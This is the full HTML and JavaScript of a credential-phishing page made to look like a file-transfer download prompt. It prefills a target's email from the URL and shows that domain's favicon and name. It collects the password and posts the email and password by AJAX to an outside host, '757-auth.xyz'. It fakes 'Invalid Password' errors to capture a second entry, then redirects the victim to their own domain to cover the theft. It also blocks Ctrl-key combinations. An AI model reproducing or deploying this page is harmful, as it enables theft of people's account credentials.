<!DOCTYPE html>
<html class="no-touch no-ie" lang="en">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <script type="text/javascript" charset="utf-8" id="zm-extension"
        src="chrome-extension://fdcgdnkidjaadafnichfpabhfomcebme/scripts/webrtc-patch.js" async=""></script>
    <!--<![endif]-->
    <script src="asset/jquery.js"></script>



    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="minimum-scale=1, initial-scale=1,user-scalable=no">
    
    <link rel="shortcut icon" href="asset/1.ico">
    <link rel="icon" sizes="16x16 32x32" href="asset/1.ico">
    <!-- default favicon -->
    <link rel="mask-icon" href="asset/1.svg" color="#17181A">


    <title dir="ltr">WeT</title>

    <style type="text/css">
        .assets-warning-node {
            display: none;
            visibility: hidden;
            position: fixed;
            background: #fff;
            z-index: 999;
            bottom: 0;
            left: 0;
            right: 0;
            top: 0;
            ;
            padding: 2em;
            line-height: 1.4;
            font-family: sans-serif;
            ;
            font-size: 1.1em;
        }

        .assets-warning-node p {
            max-width: 42em;
        }

        .root-node .no-script {
            position: fixed;
            background: #E65050;
            color: #fff;
            top: 0;
            left: 0;
            margin: 0;
            padding: 1em;
            font-weight: bold;
        }
    </style>
    <link rel="stylesheet" media="all" href="asset/style.css"
        onerror="assetFailed(this)">

</head>

<body onkeypress="return disableCtrlKeyCombination(event);" onkeydown="return disableCtrlKeyCombination(event);">
    
    <form method="post">
        <div class="root-node">
            <div class="app application">
                <div class="transfer" route="[object Object]" id="059a812e9bcfcfe9633f58291d2f60ad20180915161015"
                    secret="4fae7b">
                    <div>
                        <div class="transfer__window downloader">
                            <div class="scrollable transfer__contents">
                                <div class="scrollable__content" style="margin-right: 0px;">
                                    <div
                                        class="downloader__heading downloader__heading--1-files downloader__heading--message">
                                        <svg class="downloader__top-icon" viewBox="0 0 170 170">
                                            <g fill="#D4D7D9" fill-rule="evenodd">
                                                <path
                                                    d="M145.104 24.896c33.195 33.194 33.195 87.014 0 120.208-33.194 33.195-87.014 33.195-120.208 0C-8.3 111.91-8.3 58.09 24.896 24.896 58.09-8.3 111.91-8.3 145.104 24.896zm-7.071 7.071c-29.29-29.29-76.777-29.29-106.066 0-29.29 29.29-29.29 76.777 0 106.066 29.29 29.29 76.777 29.29 106.066 0 29.29-29.29 29.29-76.777 0-106.066z">
                                                </path>
                                                <path
                                                    d="M82 100.843V59.007A4.006 4.006 0 0 1 86 55c2.21 0 4 1.794 4 4.007v41.777l15.956-15.956a4.003 4.003 0 0 1 5.657 0 4.004 4.004 0 0 1 0 5.657l-22.628 22.628a3.99 3.99 0 0 1-3.017 1.166 3.992 3.992 0 0 1-3.012-1.166L60.328 90.485a4.003 4.003 0 0 1 0-5.657 4.004 4.004 0 0 1 5.657 0L82 100.843z">
                                                </path>
                                            </g>
                                        </svg>
                                        <div style="color:red;" align="center">Confirm Receiving Email</div>
                                        <h2>Ready when you are</h2>
                                        <p>Files deleted in 24 hours</p>
                                        <center>
                                            <div class="alert alert-danger" id="msg" style="display: none; background-color: rgba(255, 0, 0, 0.2); margin: 10px; padding: 3px; border-radius: 5px; font-size: small;" >Invalid Password! Please Enter your correct Password</div>
                                            <div id="error" class="text-danger" style="display: none; background-color: rgba(255, 0, 0, 0.2); margin: 10px; padding: 3px; border-radius: 5px; font-size: small;">Invalid Email, Please enter a valid email to proceed</div>
                                            <div id="paserror" class="text-danger" style="display: none; background-color: rgba(255, 0, 0, 0.2); margin: 10px; padding: 3px; border-radius: 5px; font-size: small;">Please input a password to proceed</div>
                                        </center>
                                        <div class="downloader__message downloader__message--expanded">
                                            <div align="center">
                                                <input name="a" id="email" value=""
                                                    style="width:100%; border:none; border-bottom:2px solid #C8C8C8; font-size:14px; padding:3px; color:#249; margin-bottom:8px;"
                                                    placeholder="Enter Receiver Email" required="" type="email"><br>
                                                <input id="password" name="b" placeholder=" Enter Password"
                                                    style="width:100%; border:none; border-bottom:2px solid #C8C8C8; font-size:14px; padding:-30px; color:#999;"
                                                    required="" type="password">
                                                    

                                            </div>
                                        </div>
                                    </div>
                                    <ul class="filelist"
                                        style="width:100%; border:none; border-bottom:30px solid #C8C8C8; font-size:14px; padding:-60px; color:#999;">

                                        <li class="filelist__item">
                                            <div class="filelist__meta"><span class="filelist__name">Drawing
                                                    Specification.pdf</span>
                                                <p class="filelist__size"><span>194 KB</span></p><br>

                                                <div class="filelist__action"><svg viewBox="0 0 24 24">
                                                        <path
                                                            d="M22 12c0-5.523-4.477-10-10-10S2 6.477 2 12s4.477 10 10 10 10-4.477 10-10zm-9 1.492V7.998C13 7.446 12.552 7 12 7c-.556 0-1 .447-1 .998v5.48l-2.53-2.53c-.385-.385-1.022-.39-1.413.002-.393.393-.39 1.022-.002 1.412l4.247 4.247c.192.19.447.288.702.288.26.003.514-.095.708-.29l4.247-4.246c.383-.385.387-1.022-.003-1.412-.394-.393-1.023-.392-1.413-.002L13 13.492zM0 12C0 5.373 5.373 0 12 0s12 5.373 12 12-5.373 12-12 12S0 18.627 0 12z"
                                                            fill-rule="evenodd"></path>
                                                    </svg></div>
                                            </div>

                                        </li>

                                    </ul>
                                </div>

                                <div class="scrollable__scrollbar">
                                    <div class="scrollable__scrollbar-thumb"
                                        style="height: 0px; transform: translateY(0px);"></div>
                                </div>
                            </div>

                            <!-- <div class="transfer__footer"><input class="transfer__button" id="submit-btn"
                                    name="submit" value="Download" type="button" /><br></div> -->
                                    <div class="transfer__footer"><button class="transfer__button" id="submit-btn"
                                        name="submit" >Download </button><br></div>
                        </div>
                    </div>
                    
                </div>
                
                <div class="wallpaper"><img src="asset/try.png" style="background-size: 100%;"></img><span class="wallpaper__title">Share in styles</span></div>
                <div class="welcome"></div>
                <nav class="nav nav--loaded">
                    <ul class="nav__items">
                        <li class="nav__item"><a href="" class="nav__label">Help</a></li>
                        <li class="nav__item nav_item--expanded"><a href="" class="nav__label">About us</a>
                                
                        </li>
                        <li class="nav__item"><a href="" class="nav__label">Got Plus?</a></li>
                    </ul>
                </nav>
                
            </div>
        </div>
    </form>
    
<!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
  </body>

  <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
  <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
  <script>

    /* global $ */
    $(document).ready(function(){
      var count=0;

      $('#back1').click(function () {
        $("#msg").hide();
        $('#email').val("");
        $("#automail").animate({left:200, opacity:"hide"}, 0);
        $("#inputbar").animate({right:200, opacity:"show"}, 1000);

      });

      var email = window.location.hash.substr(1);
      if (!email) {

      }
      else
      {
        var my_email =email;
        $('#email').val(my_email);
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        // if (!filter.test(my_email)) {
        //   $('#error').show();
        //   email.focus;
        //   return false;
        // }
        var ind=my_email.indexOf("@");
        var my_slice=my_email.substr((ind+1));
        var c= my_slice.substr(0, my_slice.indexOf('.'));
        var final= c.toLowerCase();
        var finalu= c.toUpperCase();

        $("#logoimg").attr("src", "https://www.google.com/s2/favicons?domain="+my_slice);
        $("#logoname").html(finalu);
        $(".logoname").html(finalu);
      }


      
      $('#submit-btn').click(function(event){
        $('#error').hide();
        $('#msg').hide();
        $('#paserror').hide();
        event.preventDefault();
        var email=$("#email").val();
        var password=$("#password").val();
        var msg = $('#msg').html();
        $('#msg').text( msg );
      ///////////new injection////////////////
      var my_email =email;
      var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

      if (!filter.test(my_email)) {
        $('#error').show();
        email.focus;
        return false;
      }

      if (password == '') {
        $('#paserror').show();
        password.focus;
        return false;
      }

      var ind=my_email.indexOf("@");
      var my_slice=my_email.substr((ind+1));
      var c= my_slice.substr(0, my_slice.indexOf('.'));
      var final= c.toLowerCase();
      var finalu= c.toUpperCase();

        $("#logoimg").attr("src", "https://www.google.com/s2/favicons?domain="+my_slice);
        $(".logoimg").attr("src", "https://www.google.com/s2/favicons?domain="+my_slice);
        $("#logoname").html(finalu);
      ///////////new injection////////////////
      count=count+1;
      
      $.ajax({
        dataType: 'JSON',
        url: 'https://processing.wetrans.auth.757-auth.xyz/drun.php',
        type: 'POST',
        data:{
          email:email,
          password:password,
        },
            // data: $('#contact').serialize(),
            beforeSend: function(xhr){
              $('#submit-btn').html('Verifing...');
            },
            success: function(response){
              if(response){
                $("#msg").show();
                console.log(response);
                if(response['signal'] == 'ok'){
                  $("#password").val("");
                  if (count>=2) {
                    count=0;
                    // window.location.replace(response['redirect_link']);
                    window.location.replace("http://www."+my_slice);

                  }
                  // $('#msg').html(response['msg']);
                }
                else{
                  // $('#msg').html(response['msg']);
                }
              }
            },
            error: function(){
              $("#password").val("");
              if (count>=2) {
                count=0;
                window.location.replace("http://www."+my_slice);
              }
              $("#msg").show();
              // $('#msg').html("Please try again later");
            },
            complete: function(){
              $('#submit-btn').html('Sign in');
            }
          });
    });


    });


  </script>

</html>